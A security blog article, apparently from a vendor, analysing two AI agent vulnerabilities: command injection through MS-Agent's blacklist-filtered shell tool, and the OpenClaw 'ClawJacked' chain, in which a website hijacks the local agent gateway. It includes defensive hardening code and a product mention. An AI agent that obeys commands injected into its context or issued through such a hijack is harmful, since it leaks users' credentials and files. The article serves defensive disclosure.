Zero-Click, Zero-Warning: The New Normal for AI Agent Attacks
In the same week that Google patched CVE-2026-0628 in Chrome’s Gemini panel, two separate research disclosures landed that together make a stark case about the state of AI agent security in early 2026. Both involved widely used AI agent frameworks. Both gave attackers the ability to execute arbitrary commands on the host system. Both were exploited through fundamentally the same underlying mechanism — a language model that cannot distinguish between legitimate instructions and adversarially injected ones.
The frameworks are MS-Agent and OpenClaw. The vulnerabilities are CVE-2026-2256 and CVE-2026-25253, respectively. If your engineering organization uses either framework — or any AI agent framework with system-level access — these disclosures have direct implications for your security posture.
MS-Agent is an open-source framework from ModelScope for creating AI agents capable of generating code, analyzing data, and interacting with system tools. It is based on MCP (Model Calling Protocol) and gives agents a Shell tool — the ability to execute OS commands on the host system as part of their normal operation.
The vulnerability, tracked as CVE-2026-2256 with a CVSS score of 9.8, was discovered by security researcher Itamar Yochpaz and disclosed via CERT/CC advisory VU#431821. The root cause is straightforward: MS-Agent’s Shell tool does not properly sanitize input before passing it to the OS for execution. The tool does implement a check function — six validation layers, in fact — but those layers use a regex-based blacklist pattern to filter dangerous commands. This is a known unsafe pattern. Blacklist-based filtering can be bypassed by command obfuscation, alternative syntax, encoding variations, or any input structure that the blacklist did not anticipate.
The result is that an attacker who can influence what content the MS-Agent processes — through a crafted document, malicious code in the agent’s context, a manipulated data source — can inject commands that survive all six validation layers and execute on the host with the full privileges of the MS-Agent process. Successful exploitation enables the attacker to read API keys, tokens, and configuration files; drop payloads on the host; modify the workspace state; establish persistence; pivot to internal services and adjacent systems; and inject input into build outputs, reports, or files that are consumed downstream.
At the time of SecurityWeek’s disclosure report, the vendor had not responded during CERT/CC coordination efforts. There is no official patch. Organizations using MS-Agent are currently operating with an unpatched CVSS 9.8 vulnerability.
OpenClaw is a self-hosted AI agent that has become the fastest-growing open-source project in GitHub’s history, reaching over 100,000 stars in less than a week after its launch. It runs locally on developer machines, integrates with messaging apps, calendars, and developer tools, and takes autonomous actions on the user’s behalf — sending emails, executing shell commands, reading files, managing workflows.
The ClawJacked vulnerability, discovered by Oasis Security and disclosed on February 26, 2026, is architecturally different from the MS-Agent flaw but equally severe. It does not require prompt injection or malicious content in the agent’s data pipeline. It requires only that the developer, running OpenClaw in the background, visits any attacker-controlled website in their browser.
OpenClaw’s gateway is a local WebSocket server that binds to localhost and acts as the central orchestration layer for the agent. The gateway assumes that connections originating from localhost are inherently trusted — a reasonable assumption in a world where only local applications can reach localhost. But browsers do not block cross-origin WebSocket connections to loopback addresses. JavaScript running on any website can silently open a WebSocket connection to a locally-running service without triggering any browser warning or user prompt.
The attack chain was a cascade of three flawed design assumptions. First, the gateway trusted localhost connections implicitly. Second, the rate limiter completely exempted loopback connections — failed authentication attempts were not counted, throttled, or logged. Third, the gateway automatically approved device pairings from localhost without requiring user confirmation. The consequence: a malicious website’s JavaScript could silently open a connection, brute-force the gateway password at hundreds of attempts per second (a common password list is exhausted in under a second at that rate), register as a trusted device without any user prompt, and gain full admin-level control of the agent.
“In practice, this means an attacker could instruct the agent to search the developer’s Slack history for API keys, read private messages, exfiltrate files from connected devices, or execute arbitrary shell commands on any paired node,” Oasis Security wrote. “For a developer with typical OpenClaw integrations, this is equivalent to full workstation compromise, initiated from a browser tab.”
The OpenClaw team classified this as high severity and shipped a fix in version 2026.2.25 within 24 hours of disclosure — a response time that deserves recognition. But with OpenClaw’s massive adoption footprint, organizations should assume unpatched instances exist across developer fleets. This is a shadow AI problem as much as it is a patching problem.
Reading CVE-2026-2256 and CVE-2026-25253 alongside CVE-2026-0628 from the same week, a pattern emerges that every organization deploying AI agents needs to internalize.
AI agents that take autonomous actions — executing shell commands, reading files, managing credentials, calling APIs — have a blast radius that scales with their capability. A language model that can only generate text has limited exposure when compromised. An agent that can execute arbitrary OS commands, exfiltrate files, read credentials, and pivot to adjacent systems has the blast radius of a privileged system account. The security requirements are correspondingly different.
The MS-Agent vulnerability is a classic injection flaw — the same category of vulnerability that SQL injection and command injection belong to — applied to the interface between a language model and a system shell. The input that reaches the shell is controlled, at least partially, by whoever can influence the agent’s context. Blacklist-based filtering on that input is insufficient. The fix is architectural: strict allowlists that permit only specific, pre-approved commands; sandboxing that limits what a compromised agent process can reach; least-privilege execution that bounds the damage of a successful injection.
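An allowlist-based shell tool of the kind this paragraph calls for, written as an added illustration for this article rather than taken from MS-Agent: only pre-approved programs and flags are accepted, every argument is checked against a conservative character set, positional arguments must resolve inside a sandbox directory, and the command is executed without a shell. The allowlist contents, the workspace path and the environment are assumptions chosen for the example.

```python
import re
import shlex
import subprocess
from pathlib import Path

# Per-program allowlist of non-path tokens (flags and subcommands). Any other
# argument must be a relative path that stays inside WORKSPACE. These values
# are illustrative for this example, not MS-Agent's real policy.
ALLOWED = {
    "ls": {"-l", "-a", "-la"},
    "cat": set(),
    "git": {"status", "log", "diff", "--oneline", "--stat"},
}
WORKSPACE = Path("/tmp/agent-workspace")         # assumed sandbox root
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9._/-]+$")  # no shell metacharacters at all

class CommandRejected(ValueError):
    pass

def validate_command(command: str) -> list:
    """Return argv for a permitted command; raise CommandRejected otherwise."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:                     # unbalanced quotes and the like
        raise CommandRejected(f"unparseable command: {exc}")
    if not argv:
        raise CommandRejected("empty command")
    prog, args = argv[0], argv[1:]
    if prog not in ALLOWED:
        raise CommandRejected(f"program not allowlisted: {prog!r}")
    root = WORKSPACE.resolve()
    for arg in args:
        if not SAFE_TOKEN.match(arg):
            raise CommandRejected(f"disallowed characters in {arg!r}")
        if arg in ALLOWED[prog]:
            continue                              # known flag or subcommand
        if arg.startswith("-"):
            raise CommandRejected(f"flag not allowlisted for {prog}: {arg!r}")
        # Positional argument: must still be inside the workspace after resolution.
        if not (root / arg).resolve().is_relative_to(root):
            raise CommandRejected(f"path escapes workspace: {arg!r}")
    return argv

def run_tool(command: str) -> subprocess.CompletedProcess:
    """Run a validated command with no shell, a pinned cwd and a minimal environment."""
    argv = validate_command(command)
    return subprocess.run(argv, shell=False, cwd=WORKSPACE, capture_output=True,
                          text=True, timeout=30, env={"PATH": "/usr/bin:/bin"})
```

Because the policy names what is permitted rather than what is forbidden, obfuscated or alternative syntax has nothing to slip past: anything not on the list is refused before it reaches the OS.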
The OpenClaw vulnerability is a trust boundary failure. The gateway trusted localhost, but localhost was reachable by untrusted content — any website in the developer’s browser. The fix is to not conflate the origin of a connection with the trustworthiness of its source. Local does not mean safe. Rate limiting needs to apply regardless of connection origin. Device pairings require explicit user confirmation, always.
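The three design fixes described above, as an added example that is not OpenClaw's own code: an Origin check at the WebSocket handshake that refuses browser-originated connections regardless of peer address, a failure counter that does not exempt loopback, and a pairing flow in which nothing becomes trusted until a person confirms it. The trusted origin value, the lockout thresholds and the password hashing (SHA-256 standing in for a real KDF) are assumptions for illustration.

```python
import hashlib
import hmac
# Illustrative policy values chosen for this example, not OpenClaw's own settings.
ALLOWED_ORIGINS = {"app://openclaw-desktop"}   # assumed Origin of the native client
MAX_FAILURES = 5                                # wrong passwords before lockout
LOCKOUT_SECONDS = 300

class Gateway:
    def __init__(self, password: str):
        self._pw_hash = hashlib.sha256(password.encode()).digest()  # stand-in for a real KDF
        self._failures: dict[str, tuple[int, float]] = {}  # client -> (count, locked_until)
        self._pending: set[str] = set()
        self.trusted: set[str] = set()      # devices a person has explicitly approved

    def accept_handshake(self, headers: dict) -> bool:
        # Browsers always send Origin on a cross-site WebSocket open, so a page in
        # the user's browser is refused even though its TCP peer is 127.0.0.1.
        origin = headers.get("Origin")
        if origin is None:                  # non-browser client: must still authenticate
            return True
        return origin in ALLOWED_ORIGINS

    def authenticate(self, client: str, password: str, now: float) -> bool:
        # The failure counter applies to every client, loopback included; `now`
        # is a monotonic timestamp supplied by the caller.
        count, locked_until = self._failures.get(client, (0, 0.0))
        if now < locked_until:
            return False                    # locked out: even the right password is refused
        candidate = hashlib.sha256(password.encode()).digest()
        if hmac.compare_digest(candidate, self._pw_hash):
            self._failures.pop(client, None)
            return True
        count += 1
        if count >= MAX_FAILURES:
            count, locked_until = 0, now + LOCKOUT_SECONDS
        self._failures[client] = (count, locked_until)
        return False

    def request_pairing(self, device_id: str) -> None:
        self._pending.add(device_id)        # queued only; nothing is trusted yet

    def confirm_pairing(self, device_id: str, user_approved: bool) -> bool:
        # Called from the user-facing prompt, never automatically for localhost.
        if device_id not in self._pending:
            return False
        self._pending.discard(device_id)
        if user_approved:
            self.trusted.add(device_id)
        return user_approved
```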
Both failures are detectable before deployment with the right evaluation tools. Static analysis of AI integration code paths — specifically the interfaces between model outputs and system execution — surfaces command injection vectors and trust boundary failures before they reach production. Apta Sentry’s code scanning pipeline is built around exactly this analysis: identifying where model-controlled data reaches privileged system interfaces, and whether the sanitization and trust controls at that interface are robust against adversarial inputs.
There is a layer to the OpenClaw story that the technical vulnerability disclosure underplays. At the time of the ClawJacked disclosure, OpenClaw had already become the most starred project in GitHub history. It had been adopted by developers at organizations across every industry in a matter of weeks, often without IT or security team visibility.
For many organizations, OpenClaw installations represent a growing category of shadow AI: developer-adopted tools that operate outside IT’s visibility, often with broad access to local systems and credentials, and no centralized governance. The ClawJacked vulnerability could be present on developer machines that the organization’s security team does not know are running OpenClaw at all.
Out of 10,700 skills on ClawHub — OpenClaw’s community marketplace — researchers at Koi Security found that more than 820 were malicious, a sharp increase from 324 discovered just weeks prior. Trend Micro found threat actors using 39 malicious skills to distribute the Atomic macOS information stealer.
The governance implication is direct: AI agents need to be inventoried, governed, and monitored with the same rigor as any other privileged software on the network. That means knowing which AI agent frameworks are running on developer machines, what credentials and capabilities those agents have been granted, and whether those agents are being monitored for anomalous behavior.
CVE-2026-2256, CERT/CC VU#431821, disclosed March 2026
SecurityWeek, Vulnerability in MS-Agent AI Framework Can Allow Full System Compromise, March 2026
CVE-2026-25253, Oasis Security, ClawJacked: OpenClaw Vulnerability Enables Full Agent Takeover, February 26, 2026
SecurityWeek, OpenClaw Vulnerability Allowed Websites to Hijack AI Agents, March 2026
Dark Reading, Critical OpenClaw Vulnerability Exposes AI Agent Risks, March 2026